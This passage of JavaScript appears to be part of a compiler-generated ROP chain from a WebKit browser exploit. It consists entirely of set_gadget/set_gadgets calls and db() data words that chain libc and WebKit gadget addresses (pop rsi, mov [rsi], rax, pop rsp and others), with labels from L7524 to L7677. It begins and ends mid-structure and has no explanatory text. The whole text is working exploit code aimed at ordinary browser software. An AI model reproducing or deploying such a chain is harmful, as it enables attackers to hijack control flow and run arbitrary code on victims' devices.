libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+366096, //L7525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7524: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7525: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7526: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7527: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+366208, //L7528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+366224, //L7529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7529: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+366336, //L7530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+366368, //L7532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+366352, //L7531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7530: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7531: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7532: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+366544, //L7534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+366560, //L7535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+366528, //L7533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7533: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7534: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7535: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+366672, //L7537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+366720, //L7540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+366688, //L7538 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7537: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7538: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7539: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7540: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+366832, //L7541+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+366824, //L7541 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7541: db([0, 0]); // 0x0 set_gadgets([ ropchain+366848, //L7541+24 ropchain+367416, //L7536 libc_base+764760, //pop rsi ropchain+366888, //L7542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7542: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7544: db([4294967260, 4294967295]); // -0x24 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+367008, //L7547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+366992, //L7545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7547: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+367184, //L7550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+367200, //L7551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+367152, //L7548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+367168, //L7549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7548: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7549: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7550: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7551: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+367280, //L7552 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+367296, //L7553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7552: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7553: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+367392, //L7556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+367376, //L7555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7555: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7556: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp 
ropchain+367432, //L7554 //L7536: libc_base+759608 //pop rax ]); //L7557: db([0, 0]); // 0x0 //L7554: set_gadgets([ libc_base+764760, //pop rsi ropchain+367528, //L7560 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+367512, //L7559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7558: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7559: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7560: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+367592, //L7561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7561: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7563: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7565: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+367752, //L7568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+367736, //L7566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7566: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7568: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+367896, //L7571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+367864, //L7569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+367880, //L7570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7569: 
db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7570: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7571: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+367984, //L7573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7572: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7573: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+368040, //L7574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7576: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+368120, //L7578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7578: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L7478: //L7427: //L7316: libc_base+764760, //pop rsi ropchain+368200, //L7579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7579: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7581: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+368320, //L7584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+368304, //L7582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7582: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L7584: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+368400, //L7585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+368416, //L7586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7585: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7586: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+368576, //L7590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+368544, //L7588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+368560, //L7589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7587: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7588: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7590: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+368632, //L7592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7592: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+368760, //L7594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+368776, //L7595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+368744, //L7593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7593: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7594: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L7595: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+368936, //L7599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+368904, //L7597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+368920, //L7598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7596: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7599: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+368992, //L7601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7601: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+369120, //L7603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+369136, //L7604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+369104, //L7602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7602: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7603: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7604: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+369296, //L7608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+369264, //L7606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+369280, //L7607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7605: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7606: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7607: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7608: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+369352, //L7610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7610: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+369480, //L7612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+369496, //L7613 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+369464, //L7611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7611: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7612: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7613: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+369576, //L7614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+369592, //L7615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7614: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7615: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+369680, //L7616 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+369696, //L7618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7616: 
db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7618: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7619: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7621: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+369856, //L7624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+369840, //L7622 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7622: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7624: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+370032, //L7627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+370048, //L7628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+370000, //L7625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+370016, //L7626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7625: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7628: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+370128, //L7629 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+370144, //L7630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7629: db([0, 0]); // 
0x0 set_gadget(libc_base+759608,); //pop rax //L7630: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+370240, //L7632 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+370224, //L7631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7631: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7632: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+370320, //L7633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7633: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7634: db([108, 0]); // 0x6c set_gadget(libc_base+144605,); //pop rdi //L7635: db([108, 0]); // 0x6c set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+370464, //L7636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+370496, //L7638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+370480, //L7637 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7636: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7637: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7638: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+370664, //L7640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+370680, //L7641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+370648, //L7639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7640: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7641: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+370792, //L7643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+370840, //L7646 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+370808, //L7644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7643: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7644: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7645: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7646: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+370952, //L7647+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+370944, //L7647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7647: db([0, 0]); // 0x0 set_gadgets([ ropchain+370968, //L7647+24 ropchain+370984, //L7642 libc_base+782311, //pop rsp ropchain+376152, //L7648 //L7642: libc_base+764760, //pop rsi ropchain+371024, //L7649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7649: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7651: 
db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+371144, //L7654 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+371128, //L7652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7652: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7654: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+371320, //L7657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+371336, //L7658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+371288, //L7655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+371304, //L7656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7655: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7656: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7657: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7658: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+371416, //L7659 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+371432, //L7660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7659: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7660: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+371528, //L7662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+371512, //L7661 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7661: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7662: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+371608, //L7663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7663: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7664: db([104, 0]); // 0x68 set_gadget(libc_base+144605,); //pop rdi //L7665: db([104, 0]); // 0x68 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+371752, //L7666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+371784, //L7668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+371768, //L7667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7666: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7667: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7668: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+371952, //L7670 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+371968, //L7671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+371936, //L7669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7669: db([0, 0]); // 
0x0 set_gadget(libc_base+144605,); //pop rdi //L7670: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7671: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+372080, //L7673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+372128, //L7676 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+372096, //L7674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7673: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7674: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7675: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7676: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+372240, //L7677+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+372232, //L7677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7677: db([0, 